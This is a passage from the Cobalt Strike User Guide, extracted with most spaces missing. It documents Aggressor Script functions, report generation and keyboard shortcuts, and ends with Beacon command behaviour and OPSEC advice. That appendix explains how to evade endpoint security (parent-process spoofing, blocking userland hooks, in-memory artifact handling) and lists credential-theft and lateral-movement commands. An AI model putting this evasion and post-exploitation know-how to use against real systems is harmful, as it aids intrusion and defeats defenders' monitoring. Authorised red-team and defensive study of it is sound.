Removeakeyboardshortcutbinding.
|
||
Arguments
|
||
$1-thekeyboardshortcut
|
||
Example
|
||
# restore default behavior of Ctrl+Left and Ctrl+Right
|
||
unbind("Ctrl+Left");
|
||
unbind("Ctrl+Right");
|
||
Seealso
|
||
&bind
|
||
url_open
|
||
OpenaURLinthedefaultbrowser.
|
||
Arguments
|
||
$1-theURLtoopen
|
||
Example
|
||
CobaltStrikeUserGuide www.fortra.com page:442
|
||
|
||
AggressorScript/Functions
|
||
command go {
|
||
url_open("https://www.cobaltstrike.com/");
|
||
}
|
||
users
|
||
Returnsalistofusersconnectedtothisteamserver.
|
||
Returns
|
||
Anarrayofusers.
|
||
Example
|
||
foreach $user (users()) {
|
||
println($user);
|
||
}
|
||
vpn_interface_info
|
||
GetinformationaboutaVPNinterface.
|
||
Arguments
|
||
$1-theinterfacename
|
||
$2-[Optional]thekeytoextractavaluefor
|
||
Returns
|
||
%info = vpn_interface_info("interface");
|
||
Returnsadictionarywiththemetadataforthisinterface.
|
||
$value = vpn_interface_info("interface", "key");
|
||
Returnsthevalueforthespecifiedkeyfromthisinterface'smetadata
|
||
Example
|
||
CobaltStrikeUserGuide www.fortra.com page:443
|
||
|
||
AggressorScript/Functions
|
||
# create a script console alias to interface info
|
||
command interface {
|
||
println("Interface $1");
|
||
foreach $key => $value (vpn_interface_info($1)) {
|
||
println("$[15]key $value");
|
||
}
|
||
}
|
||
vpn_interfaces
|
||
ReturnalistofVPNinterfacenames
|
||
Returns
|
||
Anarrayofinterfacenames.
|
||
Example
|
||
printAll(vpn_interfaces());
|
||
vpn_tap_create
|
||
CreateaCovertVPNinterfaceontheteamserversystem.
|
||
Arguments
|
||
$1-theinterfacename(e.g.,phear0)
|
||
$2-theMACaddress($nullwillmakearandomMACaddress)
|
||
$3-reserved;use$nullfornow.
|
||
$4-theporttobindtheVPN'schannelto
|
||
$5-thetypeofchannel[bind,http,icmp,reverse,udp]
|
||
Example
|
||
vpn_tap_create("phear0", $null, $null, 7324, "udp");
|
||
vpn_tap_delete
|
||
CobaltStrikeUserGuide www.fortra.com page:444
|
||
|
||
AggressorScript/PopupHooks
|
||
DestroyaCovertVPNinterface
|
||
Arguments
|
||
$1-theinterfacename(e.g.,phear0)
|
||
Example
|
||
vpn_tap_destroy("phear0");
|
||
Popup Hooks
|
||
ThefollowingpopuphooksareavailableinCobaltStrike:
|
||
Hook Where Arguments
|
||
aggressor Cobalt StrikeMenu
|
||
attacks AttacksMenu
|
||
beacon [session] $1=selectedbeaconIDs(array)
|
||
beacon_top [session] $1=selectedbeaconIDs(array)
|
||
beacon_bottom [session] $1=selectedbeaconIDs(array)
|
||
credentials CredentialBrowser $1=selectedcredentialrows(arrayof
|
||
hashes)
|
||
filebrowser [fileinfilebrowser] $1=beaconID,$2=folder,$3=selected
|
||
files(array)
|
||
help HelpMenu
|
||
listeners Listenerstable $1=selectedlistenernames(array)
|
||
pgraph [pivotgraph]
|
||
processbrowser ProcessBrowser $1=BeaconID,$2=selectedprocesses
|
||
(array)
|
||
processbrowser_ Multi-SessionProcess $1=selectedprocesses(array)
|
||
multi Browser
|
||
reporting ReportingMenu
|
||
ssh [SSHsession] $1=selectedsessionIDs(array)
|
||
CobaltStrikeUserGuide www.fortra.com page:445
|
||
|
||
AggressorScript/Report-OnlyFunctions
|
||
Hook Where Arguments
|
||
targets [host] $1=selectedhosts(array)
|
||
targets_other [host] $1=selectedhosts(array)
|
||
view ViewMenu
|
||
Report-Only Functions
|
||
ThesefunctionsapplytoCobaltStrike'scustomreportcapabilityonly.
|
||
agApplications
|
||
Pullinformationfromtheapplicationsmodel.
|
||
Arguments
|
||
$1-themodeltopullthisinformationfrom.
|
||
Returns
|
||
Anarrayofdictionaryobjectsthatdescribeseachentryintheapplicationsmodel.
|
||
Example
|
||
printAll(agApplications($model));
|
||
agC2info
|
||
Pullinformationfromthec2infomodel.
|
||
Arguments
|
||
$1-themodeltopullthisinformationfrom.
|
||
Returns
|
||
Anarrayofdictionaryobjectsthatdescribeseachentryinthec2infomodel.
|
||
CobaltStrikeUserGuide www.fortra.com page:446
|
||
|
||
AggressorScript/Report-OnlyFunctions
|
||
Example
|
||
printAll(agC2Info($model));
|
||
agCredentials
|
||
Pullinformationfromthecredentialsmodel
|
||
Arguments
|
||
$1-themodeltopullthisinformationfrom.
|
||
Returns
|
||
Anarrayofdictionaryobjectsthatdescribeseachentryinthecredentialsmodel.
|
||
Example
|
||
printAll(agCredentials($model));
|
||
agServices
|
||
Pullinformationfromtheservicesmodel
|
||
Arguments
|
||
$1-themodeltopullthisinformationfrom.
|
||
Returns
|
||
Anarrayofdictionaryobjectsthatdescribeseachentryintheservicesmodel.
|
||
Example
|
||
printAll(agServices($model));
|
||
agSessions
|
||
Pullinformationfromthesessionsmodel
|
||
CobaltStrikeUserGuide www.fortra.com page:447
|
||
|
||
AggressorScript/Report-OnlyFunctions
|
||
Arguments
|
||
$1-themodeltopullthisinformationfrom.
|
||
Returns
|
||
Anarrayofdictionaryobjectsthatdescribeseachentryinthesessionsmodel.
|
||
Example
|
||
printAll(agSessions($model));
|
||
agTargets
|
||
Pullinformationfromthetargetsmodel.
|
||
Arguments
|
||
$1-themodeltopullthisinformationfrom.
|
||
Returns
|
||
Anarrayofdictionaryobjectsthatdescribeseachentryinthetargetsmodel.
|
||
Example
|
||
printAll(agTargets($model));
|
||
agTokens
|
||
Pullinformationfromthephishingtokensmodel.
|
||
Arguments
|
||
$1-themodeltopullthisinformationfrom.
|
||
Returns
|
||
Anarrayofdictionaryobjectsthatdescribeseachentryinthephishingtokensmodel.
|
||
CobaltStrikeUserGuide www.fortra.com page:448
|
||
|
||
AggressorScript/Report-OnlyFunctions
|
||
Example
|
||
printAll(agTokens($model));
|
||
attack_describe
|
||
MapsaMITREATT&CKtacticIDtoitslongerdescription.
|
||
Returns
|
||
Thefulldescriptionofthetactic
|
||
Example
|
||
println(attack_describe("T1134"));
|
||
attack_detect
|
||
MapsaMITREATT&CKtacticIDtoitsdetectionstrategy
|
||
Returns
|
||
Thedetectionstrategyforthistactic.
|
||
Example
|
||
println(attack_detect("T1134"));
|
||
attack_mitigate
|
||
MapsaMITREATT&CKtacticIDtoitsmitigationstrategy
|
||
Returns
|
||
Themitigationstrategyforthistactic.
|
||
Example
|
||
println(attack_mitigate("T1134"));
|
||
CobaltStrikeUserGuide www.fortra.com page:449
|
||
|
||
AggressorScript/Report-OnlyFunctions
|
||
attack_name
|
||
MapsaMITREATT&CKtacticIDtoitsshortname.
|
||
Returns
|
||
Thenameorshortdescriptionofthetactic.
|
||
Example
|
||
println(attack_name("T1134"));
|
||
attack_tactics
|
||
AnarrayofMITREATT&CKtacticsknowntoCobaltStrike.
|
||
https://attack.mitre.org
|
||
Returns
|
||
AnarrayoftacticIDs(e.g.,T1001,T1002,etc.).
|
||
Example
|
||
printAll(attack_tactics());
|
||
attack_url
|
||
MapsaMITREATT&CKtacticIDtotheURLwhereyoucanlearnmore.
|
||
Returns
|
||
TheURLassociatedwiththistactic.
|
||
Example
|
||
println(attack_url("T1134"));
|
||
bookmark
|
||
CobaltStrikeUserGuide www.fortra.com page:450
|
||
|
||
AggressorScript/Report-OnlyFunctions
|
||
Defineabookmark[PDFdocumentonly]
|
||
Arguments
|
||
$1-Thebookmarktodefine[mustbethesameas&h1or&h2title].
|
||
$2-(Optional)Defineachildbookmark[mustbethesameas&h1or&h2title].
|
||
Example
|
||
# build out a document structure
|
||
h1("First");
|
||
h2("Child #1");
|
||
h2("Child #2");
|
||
# define bookmarks for it
|
||
bookmark("First");
|
||
bookmark("First", "Child #1");
|
||
bookmark("First", "Child #2");
|
||
br
|
||
Printaline-break.
|
||
Example
|
||
br();
|
||
describe
|
||
Setadescriptionforareport.
|
||
Arguments
|
||
$1-Thereporttosetadefaultdescriptionfor.
|
||
$2-Thedefaultdescription
|
||
Example
|
||
CobaltStrikeUserGuide www.fortra.com page:451
|
||
|
||
AggressorScript/Report-OnlyFunctions
|
||
describe("Foo Report", "This report is about my foo");
|
||
report "Foo Report" {
|
||
# yada yada yada...
|
||
}
|
||
h1
|
||
Printsatitleheading.
|
||
Arguments
|
||
$1-theheadingtoprint.
|
||
Example
|
||
h1("I am the title");
|
||
h2
|
||
Printsasub-titleheading.
|
||
Arguments
|
||
$1-thetexttoprint.
|
||
Example
|
||
h2("I am the sub-title");
|
||
h3
|
||
Printsasub-sub-titleheading.
|
||
Arguments
|
||
$1-thetexttoprint.
|
||
Example
|
||
CobaltStrikeUserGuide www.fortra.com page:452
|
||
|
||
AggressorScript/Report-OnlyFunctions
|
||
h3("I am not important.");
|
||
h4
|
||
Printsasub-sub-sub-titleheading.
|
||
Arguments
|
||
$1-thetexttoprint.
|
||
Example
|
||
h4("I am really not important.");
|
||
kvtable
|
||
Printsatablewithkey/valuepairs.
|
||
Arguments
|
||
$1-adictionarywithkey/valuepairstoprint.
|
||
Example
|
||
# use an ordered-hash to preserve order
|
||
$table = ohash();
|
||
$table["#1"] = "first";
|
||
$table["#2"] = "second";
|
||
$table["#3"] = "third";
|
||
kvtable($table);
|
||
landscape
|
||
Changestheorientationofthisdocumenttolandscape.
|
||
Example
|
||
landscape();
|
||
CobaltStrikeUserGuide www.fortra.com page:453
|
||
|
||
AggressorScript/Report-OnlyFunctions
|
||
layout
|
||
Printsatablewithnobordersandnocolumnheaders.
|
||
Arguments
|
||
$1-anarraywithcolumnnames
|
||
$2-anarraywithwidthvaluesforeachcolumn
|
||
$3-anarraywithadictionaryobjectforeachrow.Thedictionaryshouldhavekeysthat
|
||
correspondtoeachcolumn.
|
||
Example
|
||
@cols = @("First", "Second", "Third");
|
||
@widths = @("2in", "2in", "auto");
|
||
@rows = @(
|
||
%(First => "a", Second => "b", Third => "c"),
|
||
%(First => "1", Second => "2", Third => "3"));
|
||
layout(@cols, @widths, @rows);
|
||
list_unordered
|
||
Printsanunorderedlist
|
||
Arguments
|
||
$1-anarraywithindividualbulletpoints.
|
||
Example
|
||
@list = @("apple", "bat", "cat");
|
||
list_unordered(@list);
|
||
nobreak
|
||
Groupreportelementstogetherwithoutalinebreak.
|
||
Arguments
|
||
CobaltStrikeUserGuide www.fortra.com page:454
|
||
|
||
AggressorScript/Report-OnlyFunctions
|
||
$1-thefunctionwithreportelementstogrouptogether.
|
||
Example
|
||
# keep this stuff on the same page...
|
||
nobreak({
|
||
h2("I am the sub-title");
|
||
p("I am the initial information");
|
||
})
|
||
output
|
||
Printelementsagainstagreybackdrop.Line-breaksarepreserved.
|
||
Arguments
|
||
$1-thefunctionwithreportelementstogroupasoutput.
|
||
Example
|
||
output({
|
||
p("This is line 1
|
||
and this is line 2.");
|
||
});
|
||
p
|
||
Printsaparagraphoftext.
|
||
Arguments
|
||
$1-thetexttoprint.
|
||
Example
|
||
p("I am some text!");
|
||
p_formatted
|
||
Printsaparagraphoftextwithsomeformatpreservation.
|
||
CobaltStrikeUserGuide www.fortra.com page:455
|
||
|
||
AggressorScript/Report-OnlyFunctions
|
||
Arguments
|
||
$1-thetexttoprint.
|
||
TheFormatMarkup
|
||
1.Thisfunctionpreservesnewlines
|
||
2.Youmayspecifybulletedlists:
|
||
* I am item 1
|
||
* I am item 2
|
||
* etc.
|
||
3.Youmayspecifyaheading
|
||
===I am a heading===
|
||
Example
|
||
p_formatted("===Hello World===\n\nThis is some text.\nI am on a new line\nAnd,
|
||
I am:\n* Cool\n* Awesome\n* A bulleted list");
|
||
table
|
||
Printsatable
|
||
Arguments
|
||
$1-anarraywithcolumnnames
|
||
$2-anarraywithwidthvaluesforeachcolumn
|
||
$3-anarraywithadictionaryobjectforeachrow.Thedictionaryshouldhavekeysthat
|
||
correspondtoeachcolumn.
|
||
Example
|
||
@cols = @("First", "Second", "Third");
|
||
@widths = @("2in", "2in", "auto");
|
||
@rows = @(
|
||
CobaltStrikeUserGuide www.fortra.com page:456
|
||
|
||
AggressorScript/Report-OnlyFunctions
|
||
%(First => "a", Second => "b", Third => "c"),
|
||
%(First => "1", Second => "2", Third => "3"));
|
||
table(@cols, @widths, @rows);
|
||
ts
|
||
Printsatime/datestampinitalics.
|
||
Example
|
||
ts();
|
||
CobaltStrikeUserGuide www.fortra.com page:457
|
||
|
||
ReportingandLogging/Logging
|
||
Reporting and Logging
|
||
Logging
|
||
CobaltStrikelogsallofitsactivityontheteamserver.Theselogsarelocatedinthelogs/ folder
|
||
inthesamedirectoryyoustartedyourteamserverfrom.AllBeaconactivityisloggedherewith
|
||
adateandtimestamp.
|
||
Reports
|
||
CobaltStrikehasseveralreportoptionstohelpmakesenseofyourdataandconveyastoryto
|
||
yourclients.Youmayconfigurethetitle,description,andhostsdisplayedinmostreports.
|
||
GototheReporting menu andchooseoneofthereportstogenerate.CobaltStrikewillexport
|
||
yourreportasanMSWordorPDFdocument.
|
||
figure77-ExportReportDialog
|
||
Activity Report
|
||
CobaltStrikeUserGuide www.fortra.com page:458
|
||
|
||
ReportingandLogging/Reports
|
||
Theactivityreportprovidesatimelineofredteamactivities.Eachofyourpost-exploitation
|
||
activitiesaredocumentedhere.
|
||
figure78-TheActivityReport
|
||
Hosts Report
|
||
ThehostsreportsummarizesinformationcollectedbyCobaltStrikeonahost-by-hostbasis.
|
||
Services,credentials,andsessionsarelistedhereaswell.
|
||
CobaltStrikeUserGuide www.fortra.com page:459
|
||
|
||
ReportingandLogging/Reports
|
||
figure79-TheHostsReport
|
||
Indicators of Compromise
|
||
ThisreportresemblesanIndicatorsofCompromiseappendixfromathreatintelligencereport.
|
||
ContentincludesageneratedanalysisofyourMalleableC2profile,whichdomainyouused,and
|
||
MD5hashesforfilesyou’veuploaded.
|
||
CobaltStrikeUserGuide www.fortra.com page:460
|
||
|
||
ReportingandLogging/Reports
|
||
figure80-IndicatorsofCompromiseReport
|
||
Sessions Report
|
||
Thisreportdocumentsindicatorsandactivityonasession-by-sessionbasis.Thisreport
|
||
includes:thecommunicationpatheachsessionusedtoreachyou,MD5hashesoffilesputon
|
||
diskduringthatsession,miscellaneousindicators(e.g.,servicenames),andatimelineofpost-
|
||
exploitationactivity.Thisreportisafantastictooltohelpanetworkdefenseteamunderstandall
|
||
ofred’sactivityandmatchtheirsensorstoyouractivity.
|
||
CobaltStrikeUserGuide www.fortra.com page:461
|
||
|
||
ReportingandLogging/Reports
|
||
figure81-TheSessionsReport
|
||
Social Engineering
|
||
Thesocialengineeringreportdocumentseachroundofspearphishingemails,whoclicked,and
|
||
whatwascollectedfromeachuserthatclicked.Thisreportalsoshowsapplicationsdiscovered
|
||
bythesystemprofiler.
|
||
CobaltStrikeUserGuide www.fortra.com page:462
|
||
|
||
ReportingandLogging/CustomLogoinReports
|
||
figure82-TheSocialEngineeringReport
|
||
Tactics, Techniques, and Procedures
|
||
ThisreportmapsyourCobaltStrikeactionstotacticswithinMITRE’sATT&CKMatrix.The
|
||
ATT&CKmatrixdescribeseachtacticwithdetectionandmitigationstrategies.Youmaylearn
|
||
moreaboutMITRE’sATT&CKat:https://attack.mitre.org/
|
||
Custom Logo in Reports
|
||
CobaltStrikereportsdisplayaCobaltStrikelogoatthetopofthefirstpage.Youmayreplace
|
||
thiswithanimageofyourchoosing.GotoCobalt Strike ->Preferences ->Reporting .
|
||
CobaltStrikeUserGuide www.fortra.com page:463
|
||
|
||
ReportingandLogging/CustomReports
|
||
figure83-Preferences
|
||
Yourcustomimageshouldbe1192x257pxsetto300dpi.The300dpisettingisnecessaryfor
|
||
thereportingenginetorenderyourimageattherightsize.
|
||
Youmayalsosetanaccentcolor.Thisaccentcoloristhecolorofthethicklinebelowyour
|
||
imageonthefirstpageofthereport.Linksinsidereportsusetheaccentcolortoo.
|
||
figure84-ACustomizedReport
|
||
Custom Reports
|
||
CobaltStrikeUserGuide www.fortra.com page:464
|
||
|
||
ReportingandLogging/CustomReports
|
||
CobaltStrikeusesadomainspecificlanguagetodefineitsreports.Youmayloadyourown
|
||
reportsthroughtheReport Preferencesdialog.Tolearnmoreaboutthisfeature,consultthe
|
||
CustomReportschapteroftheAggressorScriptdocumentation.
|
||
CobaltStrikeUserGuide www.fortra.com page:465
|
||
|
||
Appendix/ KeyboardShortcuts
|
||
Appendix
|
||
Keyboard Shortcuts
|
||
Thefollowingkeyboardshortcutsareavailable.
|
||
Shortcut Where Action
|
||
Ctrl+A console selectalltext
|
||
Ctrl+F console openfindtooltosearchtheconsole
|
||
Ctrl+K console cleartheconsole
|
||
Ctrl+Minus console decreasefontsize
|
||
Ctrl+Plus console increasefontsize
|
||
Ctrl+0 console resetfontsize
|
||
Down console shownextcommandincommandhistory
|
||
Escape console cleareditbox
|
||
PageDown console scrolldownhalfascreen
|
||
PageUp console scrolluphalfascreen
|
||
Tab console completethecurrentcommand(insomeconsoletypes)
|
||
Up console showpreviouscommandincommandhistory
|
||
Ctrl+B everywhere sendcurrenttabtothebottomoftheCobaltStrikewindow
|
||
Ctrl+D everywhere closecurrenttab
|
||
Ctrl+Shift+D everywhere closealltabsexceptthecurrenttab
|
||
Ctrl+E everywhere emptythebottomoftheCobaltStrikewindow(undoCtrl+B)
|
||
Ctrl+I everywhere chooseasessiontointeractwith
|
||
Ctrl+Left everywhere switchtoprevioustab
|
||
Ctrl+O everywhere openpreferences
|
||
Ctrl+R everywhere Renamethecurrenttab
|
||
Ctrl+Right everywhere switchtonexttab
|
||
Ctrl+T everywhere takescreenshotofcurrenttab(resultissenttoteamserver)
|
||
Ctrl+Shift+T everywhere takescreenshotofCobaltStrike(resultissenttoteam
|
||
server)
|
||
CobaltStrikeUserGuide www.fortra.com page:466
|
||
|
||
Appendix/BeaconCommandBehaviorandOPSECConsiderations
|
||
Shortcut Where Action
|
||
Ctrl+W everywhere opencurrenttabinitsownwindow
|
||
Ctrl+C graph arrangesessionsinacircle
|
||
Ctrl+H graph arrangesessionsinahierarchy
|
||
Ctrl+Minus graph zoomout
|
||
Ctrl+P graph saveapictureofthegraphdisplay
|
||
Ctrl+Plus graph zoomin
|
||
Ctrl+S graph arrangesessionsinastack
|
||
Ctrl+0 graph resettodefaultzoom-level
|
||
Ctrl+F tables openfindtooltofiltertablecontent
|
||
Ctrl+A targets selectallhosts
|
||
Escape targets clearselectedhosts
|
||
TIP:
|
||
ThefulllistofDefaultKeyboardShortcutsareavailablefromthemenu(Help -> Default
|
||
Keyboard Shortcuts).
|
||
Beacon Command Behavior and OPSEC Considerations
|
||
Agoodoperatorknowstheirtoolsandhasanideaofhowthetoolisaccomplishingits
|
||
objectivesontheirbehalf.ThisdocumentsurveysBeacon'scommandsandprovides
|
||
backgroundonwhichcommandsinjectintoremoteprocesses,whichcommandsspawnjobs,
|
||
andwhichcommandsrelyoncmd.exeorpowershell.exe.
|
||
API-only
|
||
ThefollowingcommandsarebuiltintoBeaconandrelyonWin32APIstomeettheirobjectives:
|
||
cd
|
||
cp
|
||
connect
|
||
download
|
||
drives
|
||
exit
|
||
getprivs
|
||
getuid
|
||
inline-execute
|
||
CobaltStrikeUserGuide www.fortra.com page:467
|
||
|
||
Appendix/BeaconCommandBehaviorandOPSECConsiderations
|
||
jobkill
|
||
kill
|
||
link
|
||
ls
|
||
make_token
|
||
mkdir
|
||
mv
|
||
ps
|
||
pwd
|
||
rev2self
|
||
rm
|
||
rportfwd
|
||
rportfwd_local
|
||
setenv
|
||
socks
|
||
steal_token
|
||
unlink
|
||
upload
|
||
House-keeping Commands
|
||
ThefollowingcommandsarebuiltintoBeaconandexisttoconfigureBeaconorperformhouse-
|
||
keepingactions.Someofthesecommands(e.g.,clear,downloads,help,mode,note)donot
|
||
generateataskforBeacontoexecute.
|
||
argue
|
||
blockdlls
|
||
cancel
|
||
checkin
|
||
clear
|
||
downloads
|
||
help
|
||
jobs
|
||
modedns
|
||
modedns-txt
|
||
modedns6
|
||
note
|
||
powershell-import
|
||
ppid
|
||
sleep
|
||
socksstop
|
||
spawnto
|
||
Inline Execute (BOF)
|
||
CobaltStrikeUserGuide www.fortra.com page:468
|
||
|
||
Appendix/BeaconCommandBehaviorandOPSECConsiderations
|
||
ThefollowingcommandsareimplementedasinternalBeaconObjectFiles.ABeaconObject
|
||
FileisacompiledCprogram,writtentoacertainconvention,thatexecuteswithinaBeacon
|
||
session.Thecapabilityiscleanedupafteritfinishesrunning.
|
||
dllload
|
||
elevatesvc-exe
|
||
elevateuac-token-duplication
|
||
getsystem
|
||
jumppsexec
|
||
jumppsexec64
|
||
jumppsexec_psh
|
||
kerberos_ccache_use
|
||
kerberos_ticket_purge
|
||
kerberos_ticket_use
|
||
netdomain
|
||
regquery
|
||
regqueryv
|
||
remote-execpsexec
|
||
remote-execwmi
|
||
runasadminuac-cmstplua
|
||
runasadminuac-token-duplication
|
||
timestomp
|
||
ThenetworkinterfaceresolutionwithinboththeportscanandcovertvpndialogsusesaBeacon
|
||
ObjectFileaswell.
|
||
OPSECAdvice
|
||
ThememoryforBeaconObjectFilesiscontrolledwithsettingsfromtheMalleableC2’s
|
||
process-injectblock.
|
||
Post-Exploitation Jobs (Fork&Run)
|
||
ManyBeaconpost-exploitationfeaturesspawnaprocessandinjectacapabilityintothat
|
||
process.Somepeoplecallthispatternfork&run.Beacondoesthisforanumberofreasons:(i)
|
||
thisprotectstheagentifthecapabilitycrashes.(ii)historically,thisschememakesitseamless
|
||
foranx86Beacontolaunchx64post-exploitationtasks.ThiswascriticalasBeacondidn'thave
|
||
anx64builduntil2016.(iii)Somefeaturescantargetaspecificremoteprocess.Thisallowsthe
|
||
post-exactiontooccurwithindifferentcontextswithouttheneedtomigrateorspawna
|
||
payloadinthatothercontext.And(iv)thisdesigndecisionkeepsalotofclutter(threads,
|
||
suspiciouscontent)generatedbyyourpost-exactionoutofyourBeaconprocessspace.Here
|
||
arethefeaturesthatusethispattern:
|
||
Fork&RunOnly
|
||
CobaltStrikeUserGuide www.fortra.com page:469
|
||
|
||
Appendix/BeaconCommandBehaviorandOPSECConsiderations
|
||
covertvpn
|
||
execute-assembly
|
||
powerpick
|
||
TargetExplicitProcessOnly
|
||
browserpivot
|
||
psinject
|
||
Fork&RunorTargetExplicitProcess
|
||
chromedump
|
||
dcsync
|
||
desktop
|
||
hashdump
|
||
keylogger
|
||
logonpasswords
|
||
mimikatz
|
||
net*
|
||
portscan
|
||
printscreen
|
||
pth
|
||
screenshot
|
||
screenwatch
|
||
ssh
|
||
ssh-key
|
||
OPSECAdvice
|
||
UsethespawntocommandtochangetheprocessBeaconwilllaunchforitspost-exploitation
|
||
jobs.Thedefaultisrundll32.exe(youprobablydon’twantthat).Theppidcommandwillchange
|
||
theparentprocessthesejobsarerununderaswell.Theblockdllscommandwillstopuserland
|
||
hookingforsomesecurityproducts.MalleableC2'sprocess-injectblockgivesalotofcontrol
|
||
overtheprocessinjectionprocess.MalleableC2'spost-exblockhasseveralOPSECoptionsfor
|
||
thesepost-exDLLsthemselves.Forfeaturesthathaveanexplicitinjectionoption,consider
|
||
injectingintoyourcurrentBeaconprocess.CobaltStrikedetectsandactsonself-injection
|
||
differentfromremoteinjection.
|
||
Explicitinjectionwillnotcleanupanymemoryafterthepost-exploitationjobhascompleted.The
|
||
recommendationistoinjectintoaprocessthatcanbesafelyterminatedbyyoutocleanupin-
|
||
memoryartifacts.
|
||
Process Execution
|
||
CobaltStrikeUserGuide www.fortra.com page:470
|
||
|
||
Appendix/BeaconCommandBehaviorandOPSECConsiderations
|
||
Thesecommandsspawnanewprocess:
|
||
execute
|
||
run
|
||
runas
|
||
runu
|
||
OPSECAdvice
|
||
Theppidcommandwillchangetheparentprocessofcommandsrunbyexecute.Theppid
|
||
commanddoesnotaffectrunasorrunu.
|
||
Process Execution (cmd.exe)
|
||
Theshellcommanddependsoncmd.exe.Useruntorunacommandandgetoutputwithout
|
||
cmd.exe
|
||
Thepthcommandreliesoncmd.exetopassatokentoBeaconviaanamedpipe.The
|
||
commandpatterntopassthistokenisanindicatorsomehost-basedsecurityproductslookfor.
|
||
ReadHowtoPass-the-HashwithMimikatzforinstructionsonhowtodothismanually.
|
||
Process Execution (powershell.exe)
|
||
Thefollowingcommandslaunchpowershell.exetoperformsometaskonyourbehalf.
|
||
jump
|
||
winrm
|
||
jumpwinrm64
|
||
powershell
|
||
remote-execwinrm
|
||
OPSECAdvice
|
||
Usetheppidcommandtochangetheparentprocesspowershell.exeisrununder.Usethe
|
||
POWERSHELL_COMMANDAggressorScripthooktochangetheformatofthePowerShell
|
||
commandanditsarguments.Thejump winrm,jump winrm64,andpowershell[whenascript
|
||
isimported]commandsdealwithPowerShellcontentthatistoolargetofitinasingle
|
||
command-line.Togetaroundthis,thesefeatureshostascriptonaself-containedwebserver
|
||
withinyourBeaconsession.UsethePOWERSHELL_DOWNLOAD_CRADLEAggressorScript
|
||
hooktoshapethedownloadcradleusedtodownloadthesescripts.
|
||
Process Injection (Remote)
|
||
CobaltStrikeUserGuide www.fortra.com page:471
|
||
|
||
Appendix/BeaconCommandBehaviorandOPSECConsiderations
|
||
Thepost-exploitationjobcommands(previouslymentioned)relyonprocessinjectiontoo.The
|
||
othercommandsthatinjectintoaremoteprocessare:
|
||
dllinject
|
||
dllload
|
||
inject
|
||
shinject
|
||
OPSECAdvice
|
||
MalleableC2'sprocess-injectblockblockgivesalotofcontrolovertheprocessinjection
|
||
process.Whenbeaconexitsaninjectedprocessitwillnotcleanitselffrommemoryandwillno
|
||
longerbemaskedwhenthestage.sleep_maskissettotrue.Withthe4.5releasemostofthe
|
||
heapmemorywillbeclearedandreleased.Recommendationistonotexitbeaconifyoudonot
|
||
wanttoleavememoryartifactsunmaskedduringyourengagement.Whenyourengagementis
|
||
doneitisrecommendedtorebootallofthetargetedsystemstoremoveanylingeringin-
|
||
memoryartifacts.
|
||
Process Injection (Spawn&Inject)
|
||
Thesecommandsspawnatemporaryprocessandinjectapayloadorshellcodeintoit:
|
||
elevateuac-token-duplication
|
||
shspawn
|
||
spawn
|
||
spawnas
|
||
spawnu
|
||
spunnel
|
||
spunnel_local
|
||
OPSECAdvice
|
||
Usethespawntocommandtosetthetemporaryprocesstouse.Theppidcommandsetsa
|
||
parentprocessformostofthesecommands.Theblockdllscommandwillblockuserland
|
||
hooksfromsomesecurityproducts.MalleableC2'sprocess-injectblockgivesalotofcontrol
|
||
overtheprocessinjectionprocess.MalleableC2'spost-exblockprovidesoptionstoadjust
|
||
Beacon'sin-memoryevasionoptions.
|
||
Service Creation
|
||
ThefollowinginternalBeaconcommandscreateaservice(eitheronthecurrenthostora
|
||
remotetarget)torunacommand.ThesecommandsuseWin32APIstocreateandmanipulate
|
||
services.
|
||
CobaltStrikeUserGuide www.fortra.com page:472
|
||
|
||
Appendix/UnicodeSupport
|
||
elevatesvc-exe
|
||
jumppsexec
|
||
jumppsexec64
|
||
jumppsexec_psh
|
||
remote-execpsexec
|
||
OPSECAdvice
|
||
Thesecommandsuseaservicenamethatconsistsofrandomlettersandnumbersbydefault.
|
||
TheAggressorScriptPSEXEC_SERVICEhookallowsyoutochangethisbehavior.Eachofthese
|
||
commands(exceptingjumppsexec_pshandremote-execpsexec)generateaserviceEXEand
|
||
uploadittothetarget.CobaltStrike'sbuilt-inserviceEXEspawnsrundll32.exe[withno
|
||
arguments],injectsapayloadintoit,andexits.Thisisdonetoallowimmediatecleanupofthe
|
||
executable.UsetheArtifactKittochangethecontentandbehaviorsofthegeneratedEXE.
|
||
Unicode Support
|
||
Unicodeisamapofcharactersintheworld'slanguagestoafixednumberorcode-point.This
|
||
documentcoversCobaltStrike'ssupportforUnicodetext.
|
||
Encodings
|
||
Unicodeisamapofcharacterstonumbers(code-points),butitisnotanencoding.Anencoding
|
||
isaconsistentwaytoassignmeaningtoindividualorbytesequencesbymappingthemto
|
||
code-pointswithinthismap.
|
||
Internally,Javaapplications,storeandmanipulatecharacterswiththeUTF-16encoding.UTF-
|
||
16isanencodingthatusestwobytestorepresentcommoncharacters.Rarercharactersare
|
||
representedwithfourbytes.CobaltStrikeisaJavaapplicationandinternally,CobaltStrikeis
|
||
capableofstorage,manipulation,anddisplayoftextintheworld'svariouswritingsystems.
|
||
There'snorealtechnicalbarriertothisinthecoreJavaplatform.
|
||
IntheWindowsworld,thingsarealittledifferent.TheoptionsinWindowstorepresent
|
||
charactersdateallthewaybacktotheDOSdays.DOSprogramsworkwithASCIItextandthose
|
||
beautifulboxdrawingcharacters.Acommonencodingtomapnumbers0-127toUSASCIIand
|
||
128-255tothosebeautifulboxdrawingcharactershasaname.It'scodepage437.Thereare
|
||
severalvariationsofcodepage437thatmixthebeautifulboxdrawingcharacterswith
|
||
charactersfromspecificlanguages.ThiscollectionofencodingsisknownasanOEMencoding.
|
||
Today,eachWindowsinstancehasaglobalOEMencodingsetting.Thissettingdictateshowto
|
||
interprettheoutputofbyteswrittentoaconsolebyaprogram.Tointerprettheoutputof
|
||
cmd.exeproperly,it'simportanttoknowthetarget'sOEMencoding.
|
||
CobaltStrikeUserGuide www.fortra.com page:473
|
||
|
||
Appendix/UnicodeSupport
|
||
Thefuncontinuesthough.TheboxdrawingcharactersareneededbyDOSprograms,butnot
|
||
necessarilyWindowsprograms.So,withthat,WindowshastheconceptofanANSIencoding.
|
||
It'saglobalsetting,liketheOEMencoding.TheANSIencodingdictateshowANSIWin32APIs
|
||
willmapasequenceofbytestocode-points.TheANSIencodingforalanguageforgoesthe
|
||
beautifulboxdrawingcharactersforcharactersusefulinthelanguagethatencodingis
|
||
designedfor.Anencodingisnotnecessarilyconfinedtomappingonebytetoonecharacter.A
|
||
variable-lengthencodingmayrepresentthemostcommoncharactersasasinglebyteandthen
|
||
representothersassomemulti-bytesequence.
|
||
ANSIencodingsarenotthefullstorythough.TheWindowsAPIsoftenhavebothANSIand
|
||
